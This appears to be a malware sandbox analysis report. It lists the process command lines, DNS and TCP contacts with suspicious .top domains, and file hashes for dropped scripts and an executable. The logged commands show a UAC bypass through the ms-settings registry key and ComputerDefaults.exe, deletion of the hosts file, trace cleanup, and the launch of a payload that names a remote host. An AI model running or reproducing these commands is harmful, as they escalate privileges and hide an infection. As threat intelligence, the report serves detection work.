/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\190205.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\190205.vbs" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\cmd.exe

/c start /B ComputerDefaults.exe

C:\Windows\system32\ComputerDefaults.exe

ComputerDefaults.exe

C:\Windows\system32\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\190205.vbs

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

/c del /f C:\Users\Admin\AppData\Local\Temp\190205.vbs

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\90218.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\90218.vbs" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\cmd.exe

/c start /B ComputerDefaults.exe

C:\Windows\system32\ComputerDefaults.exe

ComputerDefaults.exe

C:\Windows\system32\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\90218.vbs

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\DxumhqCmD1wGZmjQzSLMX006.exe s8us6yewnfpbxeozsly0averomtyzb:DxumhqCmD1wGZmjQzSLMX006:zetolacs-cloud.top

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\DxumhqCmD1wGZmjQzSLMX006.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\DxumhqCmD1wGZmjQzSLMX006.exe s8us6yewnfpbxeozsly0averomtyzb:DxumhqCmD1wGZmjQzSLMX006:zetolacs-cloud.top

C:\Windows\system32\cmd.exe

/c del /f C:\Users\Admin\AppData\Local\Temp\90218.vbs

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\ljh0xx.exe

"C:\Windows\System32\ljh0xx.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 102.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 zetolacs-cloud.top udp
US 104.21.61.59:443 zetolacs-cloud.top tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.169.67:80 c.pki.goog tcp
US 8.8.8.8:53 59.61.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 textpubshiers.top udp
US 172.67.146.76:443 textpubshiers.top tcp
US 8.8.8.8:53 76.146.67.172.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 82.190.18.2.in-addr.arpa udp

Files

memory/1180-0-0x00000242D9A40000-0x00000242D9A41000-memory.dmp

memory/1180-1-0x00000242DB2F0000-0x00000242DB2F1000-memory.dmp

memory/1180-2-0x00000242DB360000-0x00000242DB361000-memory.dmp

memory/1180-4-0x00000242DB380000-0x00000242DB381000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\190205.vbs

MD5 8b4ed5c47fdddbeba260ef11cfca88c6
SHA1 868f11f8ed78ebe871f9da182d053f349834b017
SHA256 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA512 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

memory/1812-22-0x000001FE73680000-0x000001FE73681000-memory.dmp

memory/1812-21-0x000001FE73680000-0x000001FE73681000-memory.dmp

memory/1812-20-0x000001FE73680000-0x000001FE73681000-memory.dmp

memory/1812-26-0x000001FE73680000-0x000001FE73681000-memory.dmp

memory/1812-32-0x000001FE73680000-0x000001FE73681000-memory.dmp

memory/1812-31-0x000001FE73680000-0x000001FE73681000-memory.dmp

memory/1812-30-0x000001FE73680000-0x000001FE73681000-memory.dmp

memory/1812-29-0x000001FE73680000-0x000001FE73681000-memory.dmp

memory/1812-28-0x000001FE73680000-0x000001FE73681000-memory.dmp

memory/1812-27-0x000001FE73680000-0x000001FE73681000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\90218.vbs

MD5 b6735d02769eb31c248c32c3f6522e16
SHA1 ff4f143d9485d40c8e43f92ca91d2a1a6b6069ce
SHA256 03e8aa94045cccfd6f2871b3b68c5ad8e9046ffa9a0437d8391f1a537f171add
SHA512 1071d3227a5e861118190a239f40519c95bcac635b9eb1421f677eed0f247931c8435ad60ebb9befa72a221721ae81e2daf0c984966fa42129d7889d8f7762cf

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\DxumhqCmD1wGZmjQzSLMX006.exe

MD5 48243445b513f3a8c97165ad4ea3d18d
SHA1 7b32b405b07712482182a9c46fc244c4e516e452
SHA256 47c3fbf019f8c7c107ce2c797b594e922e68a55e7f2a01e3452f7b3e247ce75b
SHA512 f5e3b7bd296db6ed7f5170632f57c07693429608c3a7c1949f5a2b5fcc9207691bc2c783ace74af03c9a5fb362deb5077e275ad855ee1dfe3fdc84cb20c71fe8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 08b9622265d8eac57adb17046099bb3b
SHA1 2258d6ab82f0e30a7bc67b3e027c4093cef11554
SHA256 98335030aaf8e35fd20a4607ccbe11dc8cfec5175af36976e72400bbf17d7642
SHA512 c57113f87f6234d01852aa72288ebc308834809a777f77e8e686bba8f500874107eeb32c7ff5c711921e7aa570f8d7a3a415f85bbb391f91cb02e140129f4f85

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 20ac6eae2a4d952624c166cfc1ba84a0
SHA1 3069e9cc42ab72f1c6e069a57998cc7db7ac71fd
SHA256 121b1c8198ed7216b5a3b149beb98bd71939c3d9298e53b3fdfaadd4417fc30d
SHA512 77154c7a1e480c2787b1d7a3f7986051db77807113d480037bd5074d292161f3b1aba223623f53e4e892c79ec1c3134f0646ca992f66ab6c1d077ef8447539b6